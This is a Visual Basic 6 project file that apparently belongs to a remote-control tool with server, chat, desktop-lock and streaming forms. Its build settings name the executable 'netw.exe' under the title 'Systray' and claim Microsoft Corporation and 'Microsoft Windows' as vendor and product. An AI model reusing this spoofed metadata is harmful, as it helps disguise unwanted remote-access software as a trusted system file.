Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\SYSTEM\stdole2.tlb#OLE Automation
Object={FE0065C0-1B7B-11CF-9D53-00AA003C9CB6}#1.1#0; COMCT232.OCX
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Form=server.frm
Form=meldung.frm
Form=chat.frm
Object={22D6F304-B0F6-11D0-94AB-0080C74C7E95}#1.0#0; MSDXM.OCX
Module=Module1; Module1.bas
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Form=frmdesktopsperren.frm
Form=frmStream.frm
IconForm="client"
Startup="Sub Main"
HelpFile=""
Title="Systray"
ExeName32="netw.exe"
Path32="..\..\.."
Command32=""
Name="Controls"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=1
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="contr.exe"
VersionLegalCopyright="Microsoft Corporation"
VersionProductName="Betriebssystem Microsoft(R) Windows(R)"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=3
DebugStartupComponent=www.giga.de
